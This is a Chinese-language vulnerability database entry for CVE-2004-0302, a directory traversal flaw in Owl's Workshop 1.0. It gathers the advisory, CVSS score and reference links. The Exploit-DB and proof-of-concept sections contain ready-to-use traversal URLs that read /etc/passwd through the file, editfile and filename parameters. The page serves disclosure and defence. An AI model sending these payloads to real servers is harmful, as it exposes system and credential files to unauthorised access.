CVE-2004-0302
CVSS5.0
发布时间 :2004-11-23 00:00:00
修订时间 :2016-10-17 22:43:28
NMCOES    

[原文]Directory traversal vulnerability in OWLS 1.0 allows remote attackers to read arbitrary files via a .. (dot dot) in the (1) file parameter in index.php, (2) editfile in glossary.php, or (3) editfile in newmultiplechoice.php.


[CNNVD]Owl's Workshop多重远程文件泄露漏洞(CNNVD-200411-082)

        OWLS 1.0存在目录遍历漏洞。远程攻击者可以借助以下参数中的..(点 点)读取任意文件(1)index.php中的file参数,(2)glossary.php中的editfile,或者(3)newmultiplechoice.php中的editfile。

- CVSS (基础分值)

CVSS分值: 5 [中等(MEDIUM)]
机密性影响: [--]
完整性影响: [--]
可用性影响: [--]
攻击复杂度: [--]
攻击向量: [--]
身份认证: [--]

- CPE (受影响的平台与产品)

产品及版本信息(CPE)暂不可用

- OVAL (用于检测的技术细节)

未找到相关OVAL定义

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-0302
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2004-0302
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200411-082
(官方数据源) CNNVD

- 其它链接及资源

http://marc.info/?l=bugtraq&m=107712123305706&w=2
(UNKNOWN)  BUGTRAQ  20040218 ZH2004-08SA (security advisory): OWLS 1.0 Remote arbitrary files
http://www.securityfocus.com/bid/9689
(VENDOR_ADVISORY)  BID  9689
http://www.zone-h.org/en/advisories/read/id=3973/
(UNKNOWN)  MISC  http://www.zone-h.org/en/advisories/read/id=3973/
http://xforce.iss.net/xforce/xfdb/15249
(VENDOR_ADVISORY)  XF  owls-file-retrieval(15249)

- 漏洞信息

Owl's Workshop多重远程文件泄露漏洞
中危 路径遍历
2004-11-23 00:00:00 2005-10-20 00:00:00
远程  
        OWLS 1.0存在目录遍历漏洞。远程攻击者可以借助以下参数中的..(点 点)读取任意文件(1)index.php中的file参数,(2)glossary.php中的editfile,或者(3)newmultiplechoice.php中的editfile。

- 公告与补丁

        Currently we are not aware of any vendor-supplied patches for this issue. If you feel we are in error or if you are aware of more recent information, please mail us at: mailto:vuldb@securityfocus.com.

- 漏洞信息 (23722)

Fool's Workshop Owl's Workshop 1.0 multiplechoice/index.php Arbitrary File Access (EDBID:23722)
php webapps
2004-02-18 Verified
0 G00db0y
N/A [点击下载]
source: http://www.securityfocus.com/bid/9689/info

Owl's Workshop is reported prone to multiple remote file-disclosure vulnerabilities because the application fails to validate user-supplied input passed via a URI parameter. 

Upon successful exploitation of these issues, an attacker may be able to gain access to sensitive system files, potentially facilitating further attacks.

http://www.example.org/owls/multiplechoice/index.php?file=../../../../../../../../../../../../../../../etc/passwd&view=print 		

- 漏洞信息 (23723)

Fool's Workshop Owl's Workshop 1.0 glossary.php Arbitrary File Access (EDBID:23723)
php webapps
2004-02-18 Verified
0 G00db0y
N/A [点击下载]
source: http://www.securityfocus.com/bid/9689/info
 
Owl's Workshop is reported prone to multiple remote file-disclosure vulnerabilities because the application fails to validate user-supplied input passed via a URI parameter.
 
Upon successful exploitation of these issues, an attacker may be able to gain access to sensitive system files, potentially facilitating further attacks.

http://www.example.org/owls/workshop/glossary.php?editfile=../../../../../../../../../../../../../../../etc/passwd
		

- 漏洞信息 (23724)

Fool's Workshop Owl's Workshop 1.0 newmultiplechoice.php Arbitrary File Access (EDBID:23724)
php webapps
2004-02-18 Verified
0 G00db0y
N/A [点击下载]
source: http://www.securityfocus.com/bid/9689/info
  
Owl's Workshop is reported prone to multiple remote file-disclosure vulnerabilities because the application fails to validate user-supplied input passed via a URI parameter.
  
Upon successful exploitation of these issues, an attacker may be able to gain access to sensitive system files, potentially facilitating further attacks.

http://www.example.org/owls/workshop/newmultiplechoice.php?edit=1&editfile=../../../../../../../../../../../../../../../etc/passwd		

- 漏洞信息

4003
OWLS multiplechoice/index.php Arbitrary File Access
Remote / Network Access Input Manipulation
Loss of Confidentiality, Loss of Integrity
Exploit Public

- 漏洞描述

OWLS contains a flaw that allows a remote attacker to access arbitrary files outside of the web path. The issue is due to the multiplechoice/index.php not properly sanitizing user input, specifically traversal style attacks (../../) supplied via the "file" variable.

- 时间线

2004-02-18 2004-01-05
2004-02-18 Unknow

- 解决方案

Currently, there are no known upgrades, patches, or workarounds available to correct this issue.

- 相关参考

- 漏洞作者

- 漏洞信息

Owl's Workshop Multiple Remote File Disclosure Vulnerabilities
Input Validation Error 9689
Yes No
2004-02-18 12:00:00 2007-04-05 03:22:00
Disclosure of this issue has been credited to G00db0y.

- 受影响的程序版本

Fool's Workshop Owl's Workshop 1.0

- 漏洞讨论

Owl's Workshop is reported prone to multiple remote file-disclosure vulnerabilities because the application fails to validate user-supplied input passed via a URI parameter.

Upon successful exploitation of these issues, an attacker may be able to gain access to sensitive system files, potentially facilitating further attacks.

- 漏洞利用

The following proofs of concept have been provided:

http://www.example.org/owls/glossaries/index.php?file=/etc/passwd
http://www.example.org/owls/multiplechoice/index.php?file=../../../../../../../../../../../../../../../etc/passwd&view=print
http://www.example.org/owls/readings/index.php?filename=/etc/passwd
http://www.example.org/owls/multiplechoice/resultsignore.php?filename=/etc/passwd
http://www.example.org/owls/workshop/glossary.php?editfile=../../../../../../../../../../../../../../../etc/passwd
http://www.example.org/owls/workshop/newmultiplechoice.php?edit=1&editfile=../../../../../../../../../../../../../../../etc/passwd

- 解决方案

Currently we are not aware of any vendor-supplied patches for this issue. If you feel we are in error or if you are aware of more recent information, please mail us at: mailto:vuldb@securityfocus.com.

- 相关参考

 

 

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站